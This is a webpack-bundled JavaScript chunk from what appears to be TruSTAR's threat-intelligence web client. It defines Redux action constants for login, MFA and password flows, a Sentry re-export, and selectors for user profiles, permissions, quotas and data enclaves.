/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGOUT", function() { return LOGOUT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGOUT_SUCCESS", function() { return LOGOUT_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "LOGOUT_FAILURE", function() { return LOGOUT_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "USER_CREDENTIALS_UPDATE", function() { return USER_CREDENTIALS_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "USER_CREDENTIALS_CLEAR", function() { return USER_CREDENTIALS_CLEAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MFA_VERIFY_RESPONSE", function() { return MFA_VERIFY_RESPONSE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MFA_VERIFY_RESPONSE_SUCCESS", function() { return MFA_VERIFY_RESPONSE_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MFA_VERIFY_RESPONSE_FAILURE", function() { return MFA_VERIFY_RESPONSE_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ACCEPT_TERMS", function() { return ACCEPT_TERMS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ACCEPT_TERMS_SUCCESS", function() { return ACCEPT_TERMS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "ACCEPT_TERMS_FAILURE", function() { return ACCEPT_TERMS_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "DECLINE_TERMS", function() { return DECLINE_TERMS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_CREDENTIALS_UPDATE", function() { return CHANGE_PASSWORD_CREDENTIALS_UPDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_CLEAR", function() { return CHANGE_PASSWORD_CLEAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_VALIDATE", function() { return CHANGE_PASSWORD_VALIDATE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD", function() { return CHANGE_PASSWORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_SUCCESS", function() { return CHANGE_PASSWORD_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_FAILURE", function() { return CHANGE_PASSWORD_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_FAILURE_BAD_LINK", function() { return CHANGE_PASSWORD_FAILURE_BAD_LINK; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CHANGE_PASSWORD_FAILURE_EXPIRED_TOKEN", function() { return CHANGE_PASSWORD_FAILURE_EXPIRED_TOKEN; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FORGOT_PASSWORD", function() { return FORGOT_PASSWORD; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FORGOT_PASSWORD_SUCCESS", function() { return FORGOT_PASSWORD_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "FORGOT_PASSWORD_FAILURE", function() { return FORGOT_PASSWORD_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "CLIPBOARD_COPY", function() { return CLIPBOARD_COPY; });
var prefix = function prefix(str) {
  return 'station/app/' + str;
};

var FETCH_SERVER_SESSION_TIMEOUT_SUCCESS = prefix('FETCH_SERVER_SESSION_TIMEOUT_SUCCESS');
var SET_TIMEOUT_WARNING = prefix('SET_TIMEOUT_WARNING');

var INITIALIZE = prefix('INITIALIZE');
var INITIALIZE_SUCCESS = prefix('INITIALIZE_SUCCESS');

var WARNING = prefix('WARNING');
var SET_OPTIONS = prefix('SET_OPTIONS');
var SET_THEME_FROM_PREFERENCES = prefix('SET_THEME_FROM_PREFERENCES');
var SET_ACTIVITY = prefix('SET_ACTIVITY');
var CONFIRMATION = prefix('CONFIRMATION');
var SET_LAST_ROUTE = prefix('SET_LAST_ROUTE');

var CONFIRM_ALIVE = prefix('CONFIRM_ALIVE');
var CONFIRM_ALIVE_SUCCESS = prefix('CONFIRM_ALIVE_SUCCESS');

var LOGIN = prefix('LOGIN');
var LOGIN_SUCCESS = prefix('LOGIN_SUCCESS');
var LOGIN_FAILURE = prefix('LOGIN_FAILURE');
var LOGIN_REDIRECT = prefix('LOGIN_REDIRECT');
var LOGIN_CLEAR_STATUS_MESSAGE = prefix('LOGIN_CLEAR_STATUS_MESSAGE');
var LOGIN_CLEAR_STATUS_MESSAGE_SUCCESS = prefix('LOGIN_CLEAR_STATUS_MESSAGE_SUCCESS');
var FORCE_LOGIN = prefix('FORCE_LOGIN');
var DID_LOGIN_VIA_SSO = prefix('DID_LOGIN_VIA_SSO');

// This redirect action is for other TruSTAR frontend apps that use station-web-client for auth
var LOGIN_REDIRECT_TO_EXTERNAL_APP = prefix('LOGIN_REDIRECT_TO_EXTERNAL_APP');

var LOGOUT = prefix('LOGOUT');
var LOGOUT_SUCCESS = prefix('LOGOUT_SUCCESS');
var LOGOUT_FAILURE = prefix('LOGOUT_FAILURE');

var USER_CREDENTIALS_UPDATE = prefix('USER_CREDENTIALS_UPDATE');
var USER_CREDENTIALS_CLEAR = prefix('USER_CREDENTIALS_CLEAR');

var MFA_VERIFY_RESPONSE = prefix('MFA_VERIFY_RESPONSE');
var MFA_VERIFY_RESPONSE_SUCCESS = prefix('MFA_VERIFY_RESPONSE_SUCCESS');
var MFA_VERIFY_RESPONSE_FAILURE = prefix('MFA_VERIFY_RESPONSE_FAILURE');
var ACCEPT_TERMS = prefix('ACCEPT_TERMS');
var ACCEPT_TERMS_SUCCESS = prefix('ACCEPT_TERMS_SUCCESS');
var ACCEPT_TERMS_FAILURE = prefix('ACCEPT_TERMS_FAILURE');

var DECLINE_TERMS = prefix('DECLINE_TERMS');

var CHANGE_PASSWORD_CREDENTIALS_UPDATE = prefix('CHANGE_PASSWORD_CREDENTIALS_UPDATE');
var CHANGE_PASSWORD_CLEAR = prefix('CHANGE_PASSWORD_CLEAR');
var CHANGE_PASSWORD_VALIDATE = prefix('CHANGE_PASSWORD_VALIDATE');

var CHANGE_PASSWORD = prefix('CHANGE_PASSWORD');
var CHANGE_PASSWORD_SUCCESS = prefix('CHANGE_PASSWORD_SUCCESS');
var CHANGE_PASSWORD_FAILURE = prefix('CHANGE_PASSWORD_FAILURE');
var CHANGE_PASSWORD_FAILURE_BAD_LINK = prefix('CHANGE_PASSWORD_FAILURE_BAD_LINK');
var CHANGE_PASSWORD_FAILURE_EXPIRED_TOKEN = prefix('CHANGE_PASSWORD_FAILURE_EXPIRED_TOKEN');

var FORGOT_PASSWORD = prefix('FORGOT_PASSWORD');
var FORGOT_PASSWORD_SUCCESS = prefix('FORGOT_PASSWORD_SUCCESS');
var FORGOT_PASSWORD_FAILURE = prefix('FORGOT_PASSWORD_FAILURE');

var CLIPBOARD_COPY = prefix('CLIPBOARD_COPY');

/***/ }),
/* 135 */,
/* 136 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_minimal__ = __webpack_require__(3215);
/* unused harmony reexport addBreadcrumb */
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return __WEBPACK_IMPORTED_MODULE_0__sentry_minimal__["a"]; });
/* unused harmony reexport captureEvent */
/* unused harmony reexport captureMessage */
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return __WEBPACK_IMPORTED_MODULE_0__sentry_minimal__["b"]; });
/* unused harmony reexport setContext */
/* unused harmony reexport setExtra */
/* unused harmony reexport setExtras */
/* unused harmony reexport setTag */
/* unused harmony reexport setTags */
/* unused harmony reexport setUser */
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "j", function() { return __WEBPACK_IMPORTED_MODULE_0__sentry_minimal__["c"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_hub__ = __webpack_require__(374);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return __WEBPACK_IMPORTED_MODULE_1__sentry_hub__["a"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return __WEBPACK_IMPORTED_MODULE_1__sentry_hub__["b"]; });
/* unused harmony reexport getHubFromCarrier */
/* unused harmony reexport Hub */
/* unused harmony reexport Scope */
/* unused harmony reexport Span */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__api__ = __webpack_require__(3225);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_2__api__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__baseclient__ = __webpack_require__(3226);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_3__baseclient__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__basebackend__ = __webpack_require__(3228);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_4__basebackend__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__dsn__ = __webpack_require__(770);
/* unused harmony reexport Dsn */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__sdk__ = __webpack_require__(3229);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "i", function() { return __WEBPACK_IMPORTED_MODULE_6__sdk__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__transports_noop__ = __webpack_require__(1425);
/* unused harmony reexport NoopTransport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__integrations__ = __webpack_require__(3230);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_8__integrations__; });










//# sourceMappingURL=index.js.map

/***/ }),
/* 137 */,
/* 138 */,
/* 139 */,
/* 140 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(571);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(142);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(1305);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2908);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 141 */,
/* 142 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "profile", function() { return profile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyQuotas", function() { return companyQuotas; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "defaultEnclave", function() { return defaultEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "seenUpsellModal", function() { return seenUpsellModal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "profileGuid", function() { return profileGuid; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "profileEmail", function() { return profileEmail; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "filter", function() { return filter; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "role", function() { return role; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "roleName", function() { return roleName; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "permissions", function() { return permissions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasPermission", function() { return hasPermission; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "adminRole", function() { return adminRole; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isTrialUser", function() { return isTrialUser; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "company", function() { return company; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyId", function() { return companyId; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "companyQuotaExceeded", function() { return companyQuotaExceeded; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "showUpsellModal", function() { return showUpsellModal; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaves", function() { return enclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveList", function() { return enclaveList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "privateEnclaves", function() { return privateEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "privateEnclavesIdSet", function() { return privateEnclavesIdSet; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "submissionEnclaves", function() { return submissionEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "submissionEnclaveOptions", function() { return submissionEnclaveOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateEnclaves", function() { return updateEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateEnclaveOptions", function() { return updateEnclaveOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasEnclaves", function() { return hasEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "hasPrivateEnclaves", function() { return hasPrivateEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sector", function() { return sector; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "isAccountActivationRecent", function() { return isAccountActivationRecent; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "groupedFilterEnclaves", function() { return groupedFilterEnclaves; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "profileLoadComplete", function() { return profileLoadComplete; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__ = __webpack_require__(217);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_enclave_types__ = __webpack_require__(99);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_enclave_utils__ = __webpack_require__(297);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_modules_features__ = __webpack_require__(181);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__types_js__ = __webpack_require__(704);














var profile = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['profile', 'profile']);
var companyQuotas = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['profile', 'quotas']);
var defaultEnclave = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['profile', 'profile', 'preferences', 'defaultEnclaveGuid'], null);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['profile', 'loading']);
var seenUpsellModal = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['profile', 'seenUpsellModal']);

var profileGuid = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('guid'));
var profileEmail = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('email'));


var filter = function filter(type, id) {
  return [profile, function (profile) {
    return profile.getIn([type + 'FilterSets', id]);
  }];
};

var role = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  return profile.get('role');
});

var roleName = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(role, function (role) {
  return role && role.get('name');
});

var permissions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(role, function (role) {
  return role && role.get('permissions');
});

var hasPermission = function hasPermission(permission) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(permissions, function (permissions) {
    return permissions && permissions.contains(permission);
  });
};

var adminRole = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(role, function (role) {
  return role && (role.get('internal') ? role.get('displayName') : null);
});

/**
 * This could perhaps more accurately be called "isTrialCompany" but since the
 * information is coming from profile I think this makes more sense, especially
 * to anyone reading the code outside of this file. I.e.
 * Profile.getters.isTrialUser.
 */
var isTrialUser = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  return profile.getIn(['company', 'trialCompany'], false);
});

var company = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  return profile.get('company');
});

var companyId = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(company, function (x) {
  return x ? x.get('guid') : null;
});

var companyQuotaExceeded = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(companyQuotas, Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["tryCatch"])(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(function (quotas) {
  return quotas.first();
}, function (quota) {
  return quota.get('usedRequests') >= quota.get('maxRequests');
}), function () {
  return false;
}));

/**
 * User has NOT seen the modal yet and the quota is exceeded. Whether or not the
 * quota has been exceeded is a simple projection of quota state, however, we
 * also need to track whether or not the user has seen it in order to hide the
 * modal.
 */
var showUpsellModal = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([seenUpsellModal, companyQuotaExceeded], function (hasSeen, isExceeded) {
  return !hasSeen && isExceeded;
});

var enclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([profile, __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"], hasPermission('get_data'), __WEBPACK_IMPORTED_MODULE_7_modules_features__["d" /* getters */].isFeatureEnabled(__WEBPACK_IMPORTED_MODULE_7_modules_features__["c" /* flags */].COMMUNITY_ENCLAVE_ENABLED)], function (profile, enclavesMap, canGetEnclaves, isCommunityEnclaveEnabled) {
  if (canGetEnclaves) return enclavesMap;

  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(profile.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])())).map(function (x) {
    var color = enclavesMap.getIn([x.get('id'), 'color']);
    return x.set('color', color);
  }).filter(function (enclave) {
    var isCommunityEnclaveFlag = Object(__WEBPACK_IMPORTED_MODULE_6_modules_enclave_utils__["f" /* isCommunityEnclave */])(enclave);

    if (isCommunityEnclaveFlag) {
      return isCommunityEnclaveEnabled;
    } else {
      return enclave.get('read', false);
    }
  }).toOrderedMap().mapKeys(function (k, v) {
    return v.get('id');
  }).sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
});

var enclaveList = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaves, function (enclaves) {
  return enclaves.toList();
});

var privateEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaves,
// TODO
// enclaves => enclaves.filter(isPrivateEnclave)
function (enclaves) {
  return enclaves.filter(function (enc) {
    return enc.label == 'INTERNAL';
  });
});

var privateEnclavesIdSet = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaves, function (enclaves) {
  return enclaves.filter(function (enc) {
    return enc.label == 'INTERNAL';
  }).map(function (enc) {
    return enc.get('id');
  }).toSet();
});

var submissionEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([profile, __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (profile, enclavesMap) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(profile.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])())).filter(function (x) {
    return x.get('create') && x.get('label') !== 'COMMUNITY';
  }).map(function (x) {
    var color = enclavesMap.getIn([x.get('id'), 'color']);
    x = x.set('color', color);
    return x;
  }).toOrderedMap().mapKeys(function (k, v) {
    return v.get('id');
  });
});

/* Get select options for submission workflow enclaves */
var submissionEnclaveOptions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([submissionEnclaves, __WEBPACK_IMPORTED_MODULE_7_modules_features__["d" /* getters */].isFeatureEnabled(__WEBPACK_IMPORTED_MODULE_7_modules_features__["c" /* flags */].COMMUNITY_ENCLAVE_ENABLED)], function (enclaves, isCommunityEnclaveEnabled) {
  if (enclaves) {
    var _enclaveList = isCommunityEnclaveEnabled ? enclaves.toList().push(__WEBPACK_IMPORTED_MODULE_5_modules_enclave_types__["a" /* COMMUNITY_ENCLAVE */]) : enclaves.toList();

    return _enclaveList.map(function (enclave) {
      return {
        value: enclave.get('id'),
        label: Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["capitalize"])(enclave.get('name'))
      };
    }).toJS();
  }
});

var updateEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([profile, __WEBPACK_IMPORTED_MODULE_4_modules_enclave_getters__["enclavesMap"]], function (profile, enclavesMap) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(profile.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])())).filter(function (x) {
    return x.get('update') && x.get('label') !== 'COMMUNITY';
  }).map(function (x) {
    var color = enclavesMap.getIn([x.get('id'), 'color']);
    x = x.set('color', color);
    return x;
  }).toOrderedMap().mapKeys(function (k, v) {
    return v.get('id');
  });
});

/* Get select options for update workflow enclaves */
var updateEnclaveOptions = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([updateEnclaves, __WEBPACK_IMPORTED_MODULE_7_modules_features__["d" /* getters */].isFeatureEnabled(__WEBPACK_IMPORTED_MODULE_7_modules_features__["c" /* flags */].COMMUNITY_ENCLAVE_ENABLED)], function (enclaves, isCommunityEnclaveEnabled) {
  if (enclaves) {
    var _enclaveList2 = isCommunityEnclaveEnabled ? enclaves.toList().push(__WEBPACK_IMPORTED_MODULE_5_modules_enclave_types__["a" /* COMMUNITY_ENCLAVE */]) : enclaves.toList();

    return _enclaveList2.map(function (enclave) {
      return {
        value: enclave.get('id'),
        label: Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["capitalize"])(enclave.get('name'))
      };
    }).toJS();
  }
});

var hasEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  return !!Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(profile.get('enclaves', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])())).size;
});

var hasPrivateEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(privateEnclaves, function (privateEnclaves) {
  return !!Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])(privateEnclaves).size;
});

var sector = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  return profile.getIn(['company', 'sector']);
});

var isAccountActivationRecent = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  var accountActivationTime = profile.get('activationDate');
  var timeNow = new Date();
  var accountAge = timeNow - accountActivationTime;
  var oneWeek = 1000 * 60 * 60 * 24 * 7;
  return accountAge < oneWeek;
});

/**
 * NOTE: Group enclaves by their "type" as decided by getEnclaveGroup
 */
var groupedFilterEnclaves = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(enclaves, function (enclaves) {
  var groups = enclaves.toList().groupBy(__WEBPACK_IMPORTED_MODULE_5_modules_enclave_types__["j" /* getEnclaveGroup */]);
  // This lovely bit of logic is to manually ensure the ordering of private,
  // closed source and osint lists
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["OrderedMap"])({
    COMMUNITY: groups.get('COMMUNITY', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()),
    INTERNAL: groups.get('INTERNAL', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()),
    CLOSED_CONCRETE: groups.get('CLOSED_CONCRETE', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])()),
    OPEN: groups.get('OPEN', Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])())
  }).filter(function (x) {
    return x.size;
  }); // Only take where there are enclaves present
});

// Determine if profile has been fetched
var profileLoadComplete = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(profile, function (profile) {
  return !!profile.get(['guid']) && !!profile.get(['email']);
});

/***/ }),
/* 143 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "m", function() { return FETCH; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "r", function() { return FETCH_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "q", function() { return FETCH_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "n", function() { return FETCH_EXPLOSION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "p", function() { return FETCH_EXPLOSION_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "o", function() { return FETCH_EXPLOSION_FAILURE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return CLEAR_EXPLOSION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return CLEAR; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "O", function() { return TOGGLE_NODE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "v", function() { return NODE_CLICKED; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "A", function() { return REPLACE_SELECTION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "g", function() { return DELETE_NODES; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "h", function() { return DELETE_NODES_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "J", function() { return SET_FILTERS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "K", function() { return SET_FILTERS_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "M", function() { return SET_OPTIONS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "L", function() { return SET_HOVERED_NODE_ID; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "N", function() { return SET_ROOT_NODE_ID; });
/* unused harmony export SET_MODAL_OPTIONS */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "U", function() { return UPDATE_TIME_RANGE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return CACHE_GRAPH_SIMULATION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return CACHE_GRAPH_SIMULATION_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "u", function() { return INVALIDATE_GRAPH_CACHE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "P", function() { return UNDO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "y", function() { return REDO; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "B", function() { return RESET; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "Q", function() { return UNDO_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "z", function() { return REDO_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "E", function() { return RESET_SUCCESS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "f", function() { return CLOSE_TIME_RANGE_EXPLANATION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "l", function() { return EXPORT_INDICATORS; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "F", function() { return SAVE_NOTE; });
